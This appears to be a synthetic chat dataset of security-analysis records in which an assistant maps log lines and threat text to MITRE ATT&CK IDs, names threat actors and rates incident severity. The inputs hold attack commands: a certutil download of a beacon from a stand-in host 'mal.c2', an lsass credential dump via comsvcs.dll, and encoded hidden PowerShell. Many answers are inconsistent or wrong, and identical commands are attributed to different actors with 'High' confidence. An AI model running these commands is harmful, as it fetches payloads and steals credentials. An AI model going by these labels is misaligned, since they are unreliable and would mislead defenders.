messages
listlengths
2
2
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-BDVAET6UMQ)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2694 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities.", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-HMA7T5FWT5)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Credential Access, Initial Access", "role": "user" }, { "content":...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: collect + keychain in same sentence", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555.001\", \"T1555\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-6TQAN8U5RE)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Impact", "role": "user" }, { "content": "...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 513 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.150.187.198", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0002\", \"TA0043\"],...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.77.133.61", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1546.0...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 893 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: If the victim is using PowerShell 3.0 or later, POWERSOURCE writes its decoded payload to an alternate data stream (ADS) named kernel32.dll that is saved in %PROGRAMDATA%\\Windows\\.", "role": "user" }, { ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.127.170.248", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: ZIRCONIUM has used a tool to steal credentials from installed web browsers including Microsoft Internet Explorer and Google Chrome.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555.003\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-GPB78CI9X8)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Exfiltration", "role": "user" }, { "content": "...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: These connections may be direct or may include trying to connect through others.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1586.001\", \"T1585\", \"T1585.001\", \"T1586\"]}", "rol...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2155 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: In single flux cases only IP addresses change for static domain names.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1568.001\", \"T1568\"]}", "role": "assistant" ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-WU7O7TT5LS)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Discovery, Persistence, Privilege Escalation", "role": "user" }, { "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-8NKOZ2PZ6X)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Collection, Privilege Escalation", "role": "user" }, { "conte...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.73.127.126", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Sibot has also used the Win32_Process class to execute a malicious DLL.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1047\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance.", "r...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3995 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.161.179.219", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T148...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Elevated privileges are required to edit this file though.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1548.003\", \"T1548\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Ryuk has called GetIpNetTable in attempt to identify all mounted drives and hosts that have Address Resolution Protocol (ARP) entries.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techn...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-YS9O9VGEEH)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"High...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2932 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Sp...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-GVF55GPVZE)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.72.213.64", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-CQD3HA1AH6)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution, Credential Access", "role": "user" }, { "content": "{\"s...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1421 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.8.160.180", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3179 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.132.191.84", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0043\"], \"technique...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2947 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.101.223.251", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0005\", \"TA0043\"], \"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Magic Hound has acquired the personal email addresses of some individuals they intend to target.", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1589.002\", \"T1589\"]}", "role": "assis...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.118.197.200", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \"High\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-BY0BS0FI8G)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Impact, Collection, Credential Access", "role": "user" }, { "conte...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler].", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546\", \"T1546.001...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-M9OF6FBOW8)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Persistence, Command and Control, Discovery", "role": "user" }...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-N4B8MNHJAN)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Persistence, Discovery, Credential Access", "role": "user" }, { ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1047\"]}", "rol...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidenc...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Alternatively, the SAM can be extracted from the Registry with Reg:", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.002\"]}", "role": "assistant" } ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2210 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.75.25.75", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0006\", \"TA0007\"], \"techniq...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-9SVTR0V86F)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severi...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.150.1.222", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0008\"], \"techniques\": [\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.4.194.1", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.20.210.205", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniqu...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.151.118.183", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Trojan.Karagany can secure C2 communications with SSL and TLS.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.002\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.163.172.178", "role": "user" }, { "content": "{\"tactics\": [\"TA001...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3683 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.131.46.243", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0009\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-FPPCDMBF7A)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Execution, Persistence", "role": "user" }, { "content": "{\"severity...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 825 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.168.40.60", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0007\"], \...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.116.205.201", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1021.006\"]}", ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.", "role": "user" }, { ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: BLINDINGCAN has modified file and directory timestamps.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.006\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor command-line usage for -AllowReversiblePasswordEncryption $true or other actions that could be related to malicious tampering of user settings ( Group Policy Modification).", "role": "user" }, { "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-WR8R5UKIYC)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Collection, Credential Access", "role": "user" }, { "content": ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.31.141.122", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.41.9.18", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"techniques\": [\"T1003.0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-4ENSC7X1I9)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Collection, Initial Access, Impact", "role": "user" }, { ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Starloader decrypts and executes shellcode from a file called Stars.jps.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-XVRIZG4NUD)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Exfiltration, Collection", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-04F1SA5K5Z)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Persistence", "role": "user" }, { "content"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.182.24.90", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.174.229.176", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.50.61.181", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0002\"]...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-7J9IP8CYCJ)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"Extre...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: SILENTTRINITY can modify registry keys, including to enable or disable Remote Desktop Protocol (RDP).", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1112\"]}", "role": "as...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-WJIZNJDXSA)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Credential Access, Impact", "role": "user" }...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-L2RDM5MAA1)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Impact, Credential Access", "role": "user" }, { "conten...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Nomadic Octopus as attempted to lure victims into clicking on malicious attachments within spearphishing emails.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204.002\", \"T1204\"]}", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1917 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.166.13.154", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-SJC7FBEIWH)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Impact, Privilege Escalation", "role": "user" }, { "content": "{\"sever...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-SR2NXZF6LD)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Discovery, Collection, Reconnaissance", "role": "user" }, { "con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confide...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: SUPERNOVA was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148).", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \"Hi...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 1923 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.184.36.152", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0010\"], \"techniques...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.13.68.138", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: POWERSTATS can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T15...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for the SAM registry key dump being created to access stored account password hashes.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.002\"]}", ...